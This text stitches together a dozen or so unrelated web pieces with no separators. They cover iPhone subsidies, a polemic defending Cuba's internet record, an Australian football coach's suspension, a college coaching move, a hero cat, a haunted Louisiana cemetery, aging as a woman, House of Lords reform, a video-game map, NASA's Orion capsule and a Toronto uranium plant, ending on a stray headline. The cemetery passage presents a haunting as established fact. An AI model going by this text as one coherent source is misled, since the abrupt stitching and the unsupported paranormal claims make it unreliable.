Subsidies are inarguably a critical driving factor in the iPhone's success. We'd probably still buy iPhones without them, but I'd wager you'd see monthly buyers cut in half. That's subsidization's upside. Its downside is that it creates the illusion of cheaply had cutting-edge technology — call it a “consumption bubble.” Subsidies create an expectation that top-end smartphones like the iPhone should always cost a relative pittance. They also create a sense that the iPhone's more like a high-end calculator or toy — valuable, but ultimately disposable, as opposed to something like a $700-$900 laptop, say a MacBook Air, where at those prices, you're expecting several years or more of use before buying whatever's next.
Should subsidies thus go away, as T-Mobile's chief marketing officer recently argued? Digital Trends' Geoff Duncan has a fascinating breakdown of what he reasons are the cost relationships between Apple, carriers and consumers, including how those costs get rolled into contracts and what carriers are making in terms of the bottom line ARPU (the “average monthly revenue per customer”). His conclusion is hard to argue with: The ARPU has been steadily increasing for every iPhone carrier for the past two years, so even with subsidies, everyone's making a tidy profit. Drop the subsidies, and any corresponding breaks you'd expect carriers to offer on pricing plans would evaporate as the number of people willing to fork over $650-$850 for a new phone plummets. Thus, concludes Duncan:
In that scenario, the growth of the smartphone business in the United States would be cut roughly in half. That means fewer devices out in the wild, less money for device makers, and that translates directly to a slower pace of innovation. It also translates to a smaller, less vibrant developer community, which translates to fewer apps and less content for mobile devices. It also means less investment in mobile from Wall Street and other investors. If mobile operators can't show strong adoption of mobile technologies, investors and banks are will be less willing to throw their money behind network upgrades, frequency licenses, and service expansions.
Taking that into consideration when evaluating yesterday's analyst AAPL downgrade news, I think the safer assumption going forward is that we may see “tweaks” to Apple's agreements with carriers, including the way subsidies and multiyear contracts and up front device price breaks work. But subsidies won't go away. If everyone's making money here, the issue's not “to subsidize or not to subsidize” in all or nothing terms, but how to spread the profits around in a way that's viewed more equitably by all parties involved.
To answer my original question, I don't see myself ever paying $850 for an iPhone. What about you?
MORE: Why the iPhone Has a Head Start on the Future of Personal Computing
If you want to find examples of governments restricting the flow of information on the internet for political purposes, look to the United States and its allies, and not to the low-level of internet use in Cuba, which, notwithstanding press reports to the contrary, is a consequence of Cuba's comparatively low-level of economic development, not communist ‘totalitarianism.'
Part of the dogma of capitalist societies is that communist states are inherently restrictive and ‘totalitarian', in contrast to liberal democracies, which are portrayed as beacons of liberty. Communist states, we're told, suppress dissent, while capitalist states allow it to flourish. This, of course, is nonsense. All states, regardless of how they're organized economically, suppress dissent under circumstances of grave threat, and relax repression as danger diminishes. Those that are the most free, are those that face the least danger.
Highly restrictive societies are typically highly threatened. The restrictions in the Soviet Union from its birth in 1917 to its collapse in 1991 are pointed to as proof of the totalitarian nature of communism (or “Stalinism”), but the reality that the country was in a permanent state of crisis is ignored, and restrictive measures have long been recognized as legitimate and necessary under emergency conditions, including in liberal theory and practice. Wave after wave of aggression crashed against the Soviet Union from its birth until its collapse. These included the aggressions of Wilhelmine Germany, the intervention of the Entente powers in the Civil War, Japan's harassment of Soviet borders in the 1930s, the invasion of Nazi Germany, the Cold War, and Reagan's program of spending the Soviets into bankruptcy. The objective of each aggression was the total annihilation of the communist state.
Totalitarianism has not been a stranger to liberal democracies either. Despite being sheltered by two oceans, having no hostile powers on its borders, and facing no realistic threat of invasion, the US state in two world wars invested its executive with dictatorial powers. These were used to direct the country's economy, control the flow of information, crackdown on dissent, and herd potential fifth columnists into concentration camps. Even today, despite facing the comparatively minor threat of potential blowback from the political Islamic forces it has long supported to disrupt secular Arab nationalism [1], the United States, Britain, France, Canada and Australia have invested the political policing functions of their respective states with growing powers of surveillance and disruption.
Philosopher and historian Domenico Losurdo observes:
In reality, although protected by the Atlantic and the Pacific, every time it has rightly or wrongly felt itself imperilled, the North American republic has proceeded to a more or less drastic reinforcement of executive power and to more or less heavy restrictions on freedom of association of expression. This applies to the years immediately following the French Revolution (when its devotees on American soil were hit by the Alien and Sedition Acts), to the Civil War, the First Word War, the Great Depression, the Second World War and the Cold War. Even in our day, the sequel of the attack of 11 September 2001 was the opening of a concentration camp at Guantanamo, where detainees have been imprisoned without trial, and without even being informed of a specific charge, regardless of age. However terrible, the threat of terrorism is minor compared with that of invasion and military occupation, not to mention nuclear destruction. [2]
The restrictive practices, or ‘totalitarianism', of communist states are not inherent. They are, instead, defensive measures against external threat. Cuba and North Korea have been under a greater sustained threat of invasion and military occupation than any other country (and North Korea is additionally under the threat of nuclear destruction.) It is in these countries that the pressure for restrictive practices is most acutely felt. Nor are restrictions on civil and political liberties unique to communist states. They are also found in abundance in capitalist countries, as well.
To illustrate how the dogma in capitalist society conditions its mass media to portray communist countries as inherently restrictive, consider a recent Wall Street Journal article on the expansion of internet access in Cuba (“Cubans get a tantalizing taste of the internet,” August 19, 2015).
The article attributes the comparatively low level of internet use on the Caribbean island to a theorized desire of Cuban authorities to control the flow of information, rather than to a more likely explanation, namely Cuba's low level of economic development. We would expect that more developed countries would have a higher level of internet use, and less developed countries a lower level. If the level of internet use in Cuba is on par with that of other countries at the same level of economic development, the country's low level of internet use can be explained by economic development, not a desire to restrict access to the internet to control the flow of information.
The graph below uses World Bank data to show the relationship between internet use per 100 people and GDP per capita. If the Cuban government deliberately restricts internet use, we would expect Cuba to depart significantly to the right of the trend line. Instead, it falls close to it, meaning the level of internet use in Cuba is typical of countries at an equal level of economic development. We can dismiss, therefore, the view that the Caribbean island's low level of internet use is due to the government deliberately restricting access to the Web. The Wall Street Journal's explanation of the low level of internet use in Cuba is a political argument, intended to mislead and discredit, not illuminate.
At 30 users per 100 people in 2014, internet use in Cuba was on par with that of Egypt (32) and El Salvador (30) and greater than in Guatemala (23), Honduras (19), India (18), Nicaragua (18) and Haiti (11) (World Bank). The average for Central America, a region on which the United States has lavished much attention to keep it free from communist ‘totalitarianism', was 29, virtually equal to that of Cuba. If Cuba's low level of internet use is indicative of Havana deliberately restricting access to the internet to control the flow of information, then the governments of Central America, along with Egypt and India, must also be ‘totalitarian.'
More fertile ground for identifying governments that impede the flow of information for political purposes can be found in the US orbit, among such trusted US (and capitalist) allies as South Korea, Turkey, Britain, Canada and the United States itself.
The South Korean police state vigorously effaces online content it doesn't want South Koreans to see. When a computer user in South Korea clicks on an item on the North Korean Twitter account, a government warning against illegal content pops up. In 2011, South Korean authorities blocked over 53,000 internet posts for infractions which included having a kind word to say about North Korea. In the same year, the South Korean police state deleted over 67,000 Web posts that were deemed favorable to North Korea or which criticized the US or South Korean government. Over 14,000 posts were deleted in 2009. [3]
In Turkey, “thousands of Web sites are blocked by the state, mostly without any publicized reason.” [4]
In Britain, government officials have met with representatives of Twitter, Facebook and BlackBerry “to discuss voluntary ways to limit or restrict the use of social media to combat crime and periods of civil unrest.” Free-speech advocates liken these policies to those the British government “has criticized in totalitarian and one-party states.” [5]
The Canadian government recently passed legislation that would give its spy agency, CSIS, authority to disrupt “radical websites” and remove “terrorist propaganda” from the Internet—that is, restrict the flow of information on the Web. [6]
As for the United States, in 2009 “the U.S. Treasury Department ordered the closure of more than eighty websites related to Cuba that promoted trade and thus violated U.S. legislation on economic sanctions.” [7]
If the United States, South Korea, Turkey, Britain and Canada restrict the flow of information on the Internet for political reasons, how is it that Cuba is totalitarian, but these states are beacons of liberty?
Two further points.
First, the United States has waged a campaign of economic warfare against Cuba for over five decades. It's impossible to say how large the Cuban economy would be today had it been allowed to develop unimpeded, but some estimates put the cost to Cuba of US economic aggression at $750 to $975 billion. [8] One analyst estimates that “Without the blockade, the Cuban standard of living today might well be equal to that of Western Europe.” [9] If so, internet use in Cuba would likely resemble European levels of 76 per 100 people, rather than today's 30.
Second, the US propaganda system can't mention internet access in Cuba without making reference to blogger Yoani Sanchez, whose online newspaper 14ymedio “is blocked in Cuba,” according to The Wall Street Journal. [10] There is a good reason for this. Sanchez's web site appears to be a hostile project of the United States, a country in a virtual state of war with Cuba. Despite her status as a grassroots dissident, Sanchez's web site is miraculously “available in no less than 18 languages….No other site in the world, including those of major international institutions such as the UN, World Bank, IMF, OECD, and the European Union, has as many language versions available. Not even the U.S. State Department web site or the CIA has such a variety.” [11]
Moreover,
The site hosting the blog of Sanchez has a bandwidth 60 times higher than Cuba has for all its Internet users! Other questions inevitably arise about it: Who manages these pages in 18 languages? Who pays the administrators? How much? Who pays for the translators who work daily on Sanchez's site? How much? Furthermore, the management of a flow of more than 14 million visitors monthly is extremely expensive. Who pays for that? [12]
Jose Luis Martinez, a spokesman for the Foundation for Human Rights in Cuba, attributes the blocking of 14ymedio to the Cuban government's desire “to have some type of control” and of being “a totalitarian regime trying to operate in the 21st century.” [13] US client state Egypt has locked up nearly 500 of Sanchez's fellow political bloggers [14], while Washington's strategic partner and major arms buyer Saudi Arabia has sentenced one blogger to 10 years in prison and 1,000 lashes for his dissident views [15], yet Havana, the ‘totalitarian regime' that insists on ‘some type of control', has spared Sanchez a similar fate. By Martinez's reasoning, Egypt—which receives $1.3 billion annually in military aid from the United States, second only to Israel [16]—must be a totalitarian state on steroids. And yet it suffers none of the denigration Western news media heap on Cuba.
Losurdo observes that if Cuba's measures for repressing some political dissent are totalitarianism, then West Germany, which did not shrink from repressing communists, and which, like Hitler, banned the Communist Party, would also have to be regarded as totalitarian. [17] The same could be said of South Korea, whose infamous National Security Law continues to be used to lock up leftists. The South Korea police state recently disbanded one left-wing party, stripping its legislators of their parliamentary seats, and jailing a handful of its members, including the lawmaker Lee Seok-ki. [18]
Decades of low-intensity warfare against Cuba carried out by the United States, including a blockade, unremitting military threat, sabotage, support for fifth columnists, and occasional terrorism, has created a de facto state of war. Nevertheless, Cuba has reacted to this situation with measures no more drastic than those implemented in the United States during two world wars, [19] and no more drastic than those once implemented in West Germany and currently practiced with vigor in South Korea.
It's not ‘totalitarian' Cuban government policy that has limited internet use in Cuba. Internet use in Cuba has been limited by the comparatively low level of development of the Cuban economy and the US economic aggression which has stifled it. What restrictions Cuba has implemented are warranted defensive measures against the predations of its hyper-aggressive neighbor to the north. This, however, would be news to those who follow the mass media in capitalist societies. The sole interest of these media when it comes to Cuba and North Korea is to discredit ideological competitors through the propagation of dogma which treats the warts of all societies as uniquely present in those of communism and absent in those of capitalism.
1. See Robert Dreyfus, Devil's Game: How the United States Helped Unleash Fundamentalist Islam, Holt Paperbacks, 2005 and Mark Curtis, Secret Affairs: Britain's Collusion with Radical Islam, Serpent's Tail, 2010.
2. Domenico Losurdo. War and Revolution: Rethinking the 20th Century. Verso. 2015. p 58.
3. Stephen Gowans, “South Korea's Police State Wages War on Proponents of Democracy,” what's left, January 27, 2015.
4. Sebnem Arsu, “Internet filters set off protests around Turkey”, The New York Times, May 15, 2011.
5. Ravi Somaiya, “In Britain, a meeting on limiting social media”, The New York Times, August 25, 2011.
6. “Tell Parliament-defeat police state bill C-51!”, People's Voice, February 5, 2015.
7. Salim Lamrani, “The Contradictions of Cuban Blogger Yoani Sanchez,” MRZine, December 11, 2009.
8. Aida Calviac Mora, “With Obama in the White House, the blockade hasn't changed at all”, Granma International, September 16, 2010; Thomas Kenny, “Interview with Thomas Kenny co-author of Socialism of ‘Betrayed Behind the Collapse of the Soviet Union, 1917-1991,” PoliticalEconomy.ie, March 16, 2015.
9. Kenny.
10. Ryan Dube, “Cubans get a tantalizing taste of the internet,” The Wall Street Journal, August 19, 2015.
11. Lamrani.
12. Lamrani.
13. Dube.
14. Jeffrey Fleishman, “In Egypt, a blogger tries to spread ‘culture of disobedience' among youths,” The Los Angeles Times, April 29, 2009.
15. Jay Solomon and Felicia Schwartz, “U.S. rebukes Saudis for sentencing blogger to 1,000 lashes,” The Wall Street Journal, January 8, 2014.
16. Carol E. Lee and Gordon Lubold, “U.S. seeks to allay concerns of allies on Iran nuclear deal,” The Wall Street Journal, July 19, 2015.
17. Losurdo, p. 312.
18. Gowans.
19. Losurdo, p. 312.
The Football Federation Australia (FFA) independent Disciplinary & Ethics Committee comprising John Marshall SC (Chair), Lachlan Gyles SC and Robert Wheatley (the Committee) issued its decision in relation to an incident involving Adelaide United Head Coach Guillermo Amor (the Coach).
The incident took place in about the 68th minute of Adelaide United's Round 7 Hyundai A-League Match against Perth Glory on Friday, 18 November 2016.
The Committee has determined that the Coach serve a further one (1) match suspension in addition to the Mandatory Match Suspension which he already served against Sydney FC on Saturday, 26 November 2016. The Committee also issued a suspended sanction of a further two (2) matches to be served in the event that the Coach is expelled from any future match up until the conclusion of the Hyundai A-League 2016/17 season.
The Coach has the right to appeal the determination of the Committee. If the Coach intends to do so, he must advise FFA within 7 days of receiving the written determination.
For the determination of the FFA independent Disciplinary & Ethics committee, please click here
Billy Napier has told staff and others at Arizona State that he is leaving the program to become head coach at Louisiana-Lafayette, according to two sources familiar with the development.
Napier informed ASU players of his decision before their bowl practice Friday morning, a source said.
Earlier this month, Napier was given a two-year contract and promotion to associate head coach in addition to his existing offensive coordinator duties upon the Sun Devils' hiring of Herm Edwards as head coach.
It wasn't enough to keep Napier in Tempe.
"I wish Billy nothing but the best in his coaching career," Edwards said in a statement. "I can assure all Sun Devil fans that I am working diligently on hiring a coaching staff that will fit what we are trying to accomplish at ASU, led by an incredible senior quarterback in Manny Wilkins. Assistant Head Coach and Running backs coach John Simon and Co-Offensive Coordinator and Wide Receivers Coach Rob Likens will be a part of my staff going forward."
Edwards' statement did not mention ASU offensive line coach Rob Sale, who recently agreed to a two-year deal to remain with the program.
Louisiana-Lafayette recently fired head coach Mark Hudspeth after seven seasons at the school. He had a 28-38 record including 5-7 overall and 4-4 in the Sun Belt Conference in 2017.
Hudspeth was reportedly making $1,150,000 annually at the time of his dismissal. Louisiana-Lafayette has extended a five-year offer to Napier, per a source.
Napier reportedly made $550,000 in his first year with the Sun Devils, 12th highest among Pac-12 assistant coaches at public universities that disclose such information.
ASU Athletic Director Ray Anderson spoke glowingly of Napier on multiple occasions in the wake of the dismissal of former head coach Todd Graham. Napier's retention was said to be an important part of the Sun Devils' football plans moving forward, which included a stated "New Leadership Model."
Footballscoop.com reported on Thursday that Napier was one of four men who interviewed for the position along with Penn State defensive coordinator Brent Pry Nicholls head coach Tim Rebowe and Grambling head coach Broderick Fobbs.
In his first year with the the Sun Devils, Napier's offense finished sixth in the Pac-12 in yards-per-game, (427.6) tied for eighth in yards-per-play (5.6), and seventh in points per game (31.9). ASU led the Pac-12 in red zone efficiency and finished third in ball security and third in time of possession in 2017.
ASU's offense showed significant overall improvement from early in the season to how it performed after the bye week, when the Sun Devils went 5-2 to end the year.
The Sun Devils had the 14th highest-graded offense in the FBS this season according to Pro Football Focus, and the 10th highest-graded passing attack in the nation, dramatic improvements in execution from a year earlier when it was 54th and 86th in the same categories, respectively.
Napier and the rest of the team's on-field offensive staff from 2017 -- wide receivers coach Rob Likens, offensive line coach Rob Sale, and running backs coach John Simon -- were retained by Edwards, a move that was articulated as a stabilizer for the program through the transition to Edwards.
Napier arrived at ASU after coaching wide receivers at Alabama from 2013-17. Before that he had coaching stops at Colorado State and Clemson, where he was the youngest offensive coordinator in Power-5 football in 2009-10.
Tara will throw out the ceremonial first pitch at the Bakersfield Blaze's home game on Tuesday. (Photo: The Associated Press)
A family's cat captured in a viral video saving a Central California boy from a dog attack has another challenge ahead, but this time from the pitcher's mound.
Dan Besbris of the Bakersfield Blaze minor league baseball team said Friday that the cat named Tara will throw out the ceremonial first pitch at the next home game on Tuesday.
Bakersfield is Cincinnati's High-Class A California League affiliate with future prospects like Jesse Winker and Ben Lively. Former Red Tom Browning is their current pitching coach.
Besbris wouldn't reveal how they expect to pull off the stunt, hoping to heighten interest. Tara has already proven she's exceptional, he said.
"It sounds crazy," Besbris said. "But we've got a trick up our sleeve."
CLOSE A cat charges at a dog that had attacked a 4-year-old in Bakersfield, Calif. and the surveillance video that captured it all is going viral on YouTube. Shannon Rae Green
The video that's garnered millions of views online shows the 4-year-old in front of his family's Bakersfield home when the neighbor's dog bites his leg and violently shakes him. Tara darts in, pouncing on the dog, which runs away.
The boy's father, Roger Triantafilo, said his family has accepted the ball team's invitation.
Triantafilo said he edited the video captured by his home security cameras and posted it on YouTube — his first — for family and friends to see. He never anticipated the flood of attention.
Tara, who followed him and his wife, Erica, home from the park one night, is now the family's hero, and they are smothering her with love, Triantafilo said.
"We've just given her a lot of love, kept her in the house and paid a lot of attention to her," he said.
Big Woods is an old cemetery located in Edgerly, Louisiana. It was associated with Big Woods church. The old church house had been restored and was still standing until recently (1990s?) when it was vandalized and burned. Big Woods is characterized by old oak trees and old cemetery headstones, but it is still in use today and has been expanded many times.
There is a small pass that connects two graveyards: Antioch and Big Woods. There used to be a gate at the connection of these two graveyards. Now there is a sign that states, “beware of Children…or children at play” The legend is that if you see a shadow pass in front of the gate when there is no scientific explanation for a shadow passing there, Then that is a serious warning that you should not be passing there. Some who have passed through the crossing after the sighting of the gatekeeper have never come back. Numerous Ghost hunting societies have lost Compact Flash cards and Hi8 video tapes from the electromagnetic interference out there. Numerous photos of orbs and ectoplasm have been taken here. SWLA Ghost Society has written documentation that this place is in FACT haunted. People have been chased by a truck that seemed to have no driver. Cars and trucks come from the cemeteries, drive to the woods and just disappear.
Source
Source
I turned 36 this year, and I told my friend Autumn that I've been surprised by how much I've liked getting older. To be quite frank about it, I feel like I've only gotten more awesome the older I've gotten, and I fully expect that trajectory to continue to until I hopefully die at the age of 104, the most kick-ass broad in the whole damn nursing home. The world will not be capable of withstanding the force of just how kick-ass I will be.
This was not how I expected to approach my 30s. Like a lot of women I approached growing older with trepidation, having internalized the idea that my value as a human being would begin plummeting once I was no longer in my youthful, dewy 20s.
But then I got older, as one does, and I realized that, hey, it's not so bad! In fact, this is actually pretty great! I'm starting to collect life experiences and perspectives and the wisdom that ideally accompanies both. I've learned what's worthy of my attention and what I don't need to bother myself with. My ability to see through people's bullshit is in the process of being nicely honed. I still give people the benefit of the doubt – sometimes long after they've ceased to deserve the privilege – but at least now I'm making the conscious decision to do it and not because I feel like being a “nice girl” is the price I have to pay for existing on this planet.
I've heard a lot of other women report the same experience of getting older: taking less shit from other people, caring less about what others think of us, setting our own priorities for our lives. In a society that spends an awful lot of time casting opprobrium on women for our various choices – everything from how we decorate our bodies to what we do with our reproductive organs to how we spend our time – the spectre of a woman who just doesn't give a shit is downright terrifying. It means all that social judgment, all those attempts at squishing us into teensy little boxes – it's all for naught.
I don't mean to pretend like getting older is nothing but unicorns and rainbows. There's all the physical aches and pains that apparently just start appearing one day, and the devastating personal losses that continue to mount the longer we live, and obviously the giant question mark that is death. And I will be honest and admit that I felt a little twinge of panic the first time I found a gray hair and the first time I noticed my undereye wrinkles, the incontrovertible proof that yes this is happening, yes I am getting older, yes I will die some day.
But those are the existential realities of growing older, and those are not what we women are told when we are told to fear aging. We are told we will become invisible. That we will be ugly hags that no one will ever desire sexually again. That we will be biologically worthless once we can no longer bear children.
Lies. It's all lies. It's not our aging they fear. It's our power. Confident women still scare the shit out of many people in our society. What better way to undermine that confidence than by making us terrified of the single biological reality we cannot escape no matter what we do?
We're scary because we see through your bullshit. We're scary because we don't need your approval. We're scary because we don't need you.
I didn't understand this when I was in my late 20s but I do now. I'm glad I figured it out as early as I did, as I have known other women who never seemed to understand this and instead spent the latter years of their lives scrambling and hiding from the inevitable. I still remember my poor grandmother, who hated that she was growing old and squandered the last decade of her life in a state of denial. I'm sure there will be times when I curse the fact that I'm getting older, but hopefully there will be more times when I remember the way I feel about it now.
As you can tell I think about these things a lot, and I thought about them again when I read Carrie Fisher's response to people ripping on her for daring to grow older. If there's anyone who doesn't give a shit, it's the woman who responds to a legion of haters by saying:
Please stop debating about whetherOR not👁aged well.unfortunately it hurts all3 of my feelings.My BODY hasnt aged as well as I have.Blow us👌🏼 — Carrie Fisher (@carrieffisher) December 29, 2015
If this is what it means to “age badly” then I hope I age terribly.
P.S. If none of this persuades you I'll just suggest that I will happily take growing older over the alternative. That's all.
Advertisements
LONDON – For centuries, the British House of Lords has played a role in laws that have defined Western civilization. England now appears poised to end that.
The House of Commons on Tuesday voted 462-124 to advance a bill that would require most members of the House of Lords, where some of the more than 800 members inherited their seats from forebears, to gain their seats through elections.
Deputy Prime Minister Nick Clegg opened debate in Parliament on changing the "flawed institution" by saying it would make the House of Lords "more modern, more representative and more legitimate — a chamber for the 21st century."
The idea of making the upper house democratic has been floated for decades. It would strip the nation's non-elected elites — archbishops, nobles and lords appointed for life by the queen — of a legislative role.
Opponents say it is a mistake. They argue the uniquely British institution has served the country well, and that appointed peers offer expertise in science, medicine and law that elected politicians lack.
"These changes would mean people of enormous caliber who have represented our country as ambassadors, for example, or who have headed up the armed forces and have great knowledge of defense, would be replaced by career politicians trying to climb the greasy pole," Conservative parliamentarian Andrew Rosindell said.
The proposed changes would reduce the Lords' chamber to 300 "senators" with 80% of them elected to single, 15-year terms. At the same time, it would give the chamber more authority to hold the elected House of Commons accountable.
Lords have historically represented the embodiment of the British aristocracy. Images spring to mind of wealthy earls spending their days fox hunting or on pheasant shoots before retiring to a sprawling country estate for a pipe and brandy by the hearth. But fox hunting is abolished, and the monarchy is a spectacle, not a ruling class.
Thirteen years ago, the government began culling the 654 hereditary peers, or those whose titles had been passed down from ancestors. Ninety-two remain, elected by their fellow hereditary peers in 1999.
Yet in some respects the House of Lords has progressed beyond the elected House of Commons. There are 30 women in top positions in the upper chamber, and 5% of its members are from ethnic minority backgrounds, compared with 4% in the Commons.
Supporters of change say the idea that those serving in the House of Lords are sages who weigh matters without regard for political considerations is not the reality.
"Their expertise tends to be out-of-date, they tend to be retired, and often don't have the right expertise," said Peter Facey, director of Unlock Democracy, which supports an elected second chamber.
Today, the House of Lords' role is to revise, scrutinize and advise on proposed legislation. Most members are appointed by the queen on the recommendation of the prime minister or of the House of Lords Appointments Commission. Only an act of Parliament can remove a peerage; even criminal convictions don't disqualify a lord.
There have been several crooks on the red benches, as the chamber is known given the color of its seating, including novelist and former Tory member of Parliament Jeffrey Archer, jailed for perjury and perverting the course of justice.
Rosindell, one of 70 lawmakers who signed a letter opposing the bill, says Prime Minister David Cameron has far bigger things to be worrying about.
"The prime minister should get a grip and say this is an utter waste of time and focus on the serious issues facing the country: immigration, Europe and the economy."
Some lords say they answer to a higher authority than Parliament.
"I have been asked to perform a duty which I am proud to do," Lord Trefgarne, whose father was appointed by King George VI, told BBC Radio. "The Almighty decided that I was to have a certain duty imposed on me and it has never for one moment crossed my mind to (renounce) the title and do something else."
Tradition still ranks high among some who have seen centuries-old practices erased from the culture in the name of progress. Outside the Wheatsheaf pub in Tooting, south London, retail manager Brendan Turner, 42, said the House of Lords should be left as is.
"I understand the point about a new and more modern government, but these changes mean they will lose all that expertise and thousands of years of history," he says. "Why would you want to change that?"
Others say traditions shouldn't always be kept.
"I'd like to think that if we did vote (the lords) in … things would be better," said Beverly Charles, 53, a customer services assistant. "After all, their world is very different from the one the rest of us live in."
"Small city at night. Great for any mode." — In-game description
Chinatown is a multiplayer map featured in the Variety Map Pack for Call of Duty 4: Modern Warfare. It is a remake of the popular Call of Duty and Call of Duty 2 multiplayer map Carentan.
Contents show]
Overview Edit
Chinatown's layout is exactly the same as the original Carentan. The map's theme revolves around fighting in a Chinatown-themed area. Almost every building in the map is open and able to be occupied. The grenade is perfect for a mix of mid-range and close quarters combat. The central area has a basement that is frequently used. The streets of the map are risky areas to traverse, as most players will be in the buildings surrounding the area.
Old School Mode Edit
Chinatown appears in Old School Mode as a supported map. It features a total of 11 sprites.
R700 - Found in between the two white vans at the back end of the grassy area.
M249 SAW w/ Grip - Found in between the two accessible buildings in front of the grassy area, next to Double Tap.
Double Tap - Found at the intersection of the road perpendicular to the grassy area, in front of the two storey fish market building, next to the M249 SAW.
AK-47 w/ GP-25 - Found in front of the construction site near the fish market and the grassy area, near the Mini-Uzi.
Mini-Uzi w/ Silencer - Found between the fish market and the video store, near the AK-47 and Flashbang.
Flashbang - Found in between the back of the fish market and the video store, underneath the lanterns, down the stairs, near the Mini-Uzi.
M4A1 w/ Red Dot Sight - Found on the northernmost road in between the discount imports stores, near the mounted M249 SAW.
Frag Grenade - Found in front of the dry cleaning store with the mounted M249 SAW, near Stopping Power.
Stopping Power - Found behind the video store, in the parking lot, near the Frag Grenade and the G36C.
G36C w/ ACOG Scope - Found at the three way intersection behind the parking lot at the video store near Stopping Power and the Desert Eagle.
Desert Eagle - Found in the small alleyway near the market, near the G36C.
Gallery Edit
Trivia Edit
Technicians at NASA's Kennedy Space Center work to get the Orion crew capsule ready for an unmanned trip around the moon in 2018. Photo taken Sept. 8, 2016.
CAPE CANAVERAL, Fla. — NASA's next-generation crew-carrying spacecraft remains on track to make a historic journey around the moon in 2018, agency officials say.
The bulk structure of the Orion capsule that will be used for that uncrewed test flight, which is known as Exploration Mission-1 (EM-1), is now mostly complete, NASA officials said. Engineers and technicians have moved on to installing critical systems — for example, welding together the metal tubes that make up the spacecraft's propellant and other fluid lines.
This work is being done inside a large clean room at the Neil Armstrong Operations and Checkout Building here at NASA's Kennedy Space Center (KSC). [The Orion Space Capsule: NASA's Next Spaceship (Photos)]
"It's a very clean environment," Scott Wilson, NASA manager of production operations for the Orion Program, said during a media tour Thursday (Sept. 8).
"We need that for the reliability of the valves and things that have to work on the vehicle, as well as propulsion — fuel and oxidizers," he added. "If you have contaminants, it could cause contamination to stick valves or cause fires, that kind of thing."
A view of the clean room at NASA's Kennedy Space Center where the Orion capsule is being readied for a 2018 test flight around the moon. Photo taken Sept. 8, 2016. (Image: © Mike Wall, Space.com)
The KSC team will wrap up their work with Orion in February or March of 2018, said Jules Schneider, Orion KSC operations manager with Lockheed Martin, NASA's prime contractor for the vehicle. The space agency will then work to prep Orion for EM-1, which is currently scheduled to lift off in October or November 2018.
EM-1 will mark the maiden flight of the Space Launch System (SLS), the huge rocket NASA is developing to blast astronauts toward Mars and other distant destinations. On EM-1, SLS will send Orion on a three-week flight around the moon designed to test the capsule's performance in deep space.
"We really want to run Orion through its paces and stress those systems as much as we can in an uncrewed configuration to make sure we've got the design and the ability to build the vehicles properly before we put crew on it," Wilson said.
Orion has flown to space once before. In December 2014, the capsule launched on an uncrewed 4-hour orbital jaunt known as Exploration Flight Test-1 (EFT-1). (EM-1 will use a new Orion vehicle.)
Astronauts will ride aboard Orion for the first time on Exploration Mission-2 (EM-2), which NASA has said will take place no later than 2023. But the agency is working to get EM-2 off the ground in 2021, Wilson said.
"We're committed to 2021, and we're on track for that," he said.
Follow Mike Wall on Twitter @michaeldwall and Google+. Follow us @Spacedotcom, Facebook or Google+. Originally published on Space.com.
West-end residents are looking for answers after they discovered that an unassuming building on Lansdowne Ave. is actually a nuclear facility licensed to produce nearly 2,000 tonnes of radioactive uranium dioxide pellets each year. The General Electric-Hitachi plant has been processing natural uranium powder into centimetre-long pellets that are assembled into fuel bundles elsewhere for Canada's nuclear reactors since 1965.
Sheila Muir is an organizer of a campaign to stop the operation of a uranium processing plant run by GE in the Lansdowne and Dupont area. The plant has been operating for 50 years. ( RICHARD LAUTENS / TORONTO STAR )
“The shocking thing is that they can be there for so long and keep things so quiet,” said area resident Dawn Withers. GE Canada spokeswoman Kim Warburton said the plant handles only natural uranium which is “not dangerous” compared to its enriched counterpart. She said the company's sign is clearly visible. “GE-Hitachi is a nuclear business . . . it's on our website.” Withers, a mother of four who lives about a five-minute drive from the facility, has helped organize a Nov. 15 community meeting to raise awareness.
Article Continued Below
She said she and others were caught completely off-guard when an anti-nuclear activist arrived in Toronto several weeks ago to warn them about the plant. That activist was Zach Ruiter, a 29-year-old Trent University graduate who became known several years ago for his vocal opposition to another GE-Hitachi facility in Peterborough. Concerned about awareness of the Toronto plant, he decided to door-knock in the Lansdowne and Dupont St. area earlier this fall to alert the community to what he calls an environmental and public health hazard. “People living close to the plant thought it made air conditioners,” said Ruiter. “I couldn't find anyone who knew about GE-Hitachi's uranium processing.” Surrounded by a chain-link fence, the plant is owned by U.S.-based General Electric-Hitachi and is licensed by Canada's federal nuclear power regulator.
The facility is ranked as a “medium-risk facility” by the Canadian Nuclear Safety Commission due to the sheer amount of uranium handled. It has for decades played an integral role in Ontario's nuclear industry, a middleman in the lengthy process that sees raw uranium mined from the ground and transformed into energy.
Article Continued Below
Warburton, GE Canada's vice-president of communications and public affairs, said the Lansdowne facility receives barrels of uranium dioxide powder, an inert substance, from a Port Hope uranium conversion plant run by Cameco Corp., one of the world's largest uranium miners. While she would not say how it is shipped to Toronto, Warburton said the powder arrives in sealed barrels. It is then compressed into pellets and shipped to the company's Peterborough location where it is turned into fuel bundles and sent to nuclear power plants. Doug Brugge, a professor of public health and community medicine at Tufts University in Massachusetts, said the natural uranium handled by the plant poses serious health risks, including cancer, depending on the level of exposure. According to Brugge, who studies the health effects of uranium exposure, internal exposure (such as inhaling the powder form) has been proven to cause kidney and neurological damage as well as reproductive issues such as birth defects. Of course, those health effects result from severe and prolonged internal exposure. But Sheila Muir, a longtime Parkdale resident whose young family moved to a house about two kilometres from the facility just over a year ago, said she was “shocked and very, very distressed” to hear of what she sees as a potential health risk in her neighbourhood. “We as parents feel like we don't have any control over it,” said Muir, who was unaware until only recently of the facility's existence. Councillor Gord Perks, whose ward lies just south of the Lansdowne plant, said he, too, was only recently alerted to the operation. “I've been trying all my adult life to end Ontario's dependence on nuclear power and I'll just keep plugging away,” said Perks. “The risks associated with uranium processing are, in my view, unacceptable no matter where you put the (plant).” So, how could the nuclear processing facility go unnoticed by local residents for so long? In 2011, the Canadian Nuclear Safety Commission granted the GE-Hitachi facilities in Toronto and Peterborough a 10-year renewed licence. As part of the process, the company testified in Ottawa that it had improved its public consultation process and made an effort to keep nearby residents informed. An operation that for decades has quietly shuttled radioactive material in and out of Toronto, GE-Hitachi's Lansdowne operation is now under the microscope as the number of residents set to attend the Nov. 15 community meeting — co-ordinated through a Facebook event — continues to swell. “No matter how safe they say their production at their plant, there are risks,” said Withers. “There are risks and nobody knew.”
ALMA Observes Birth Cry of a Massive Baby Star
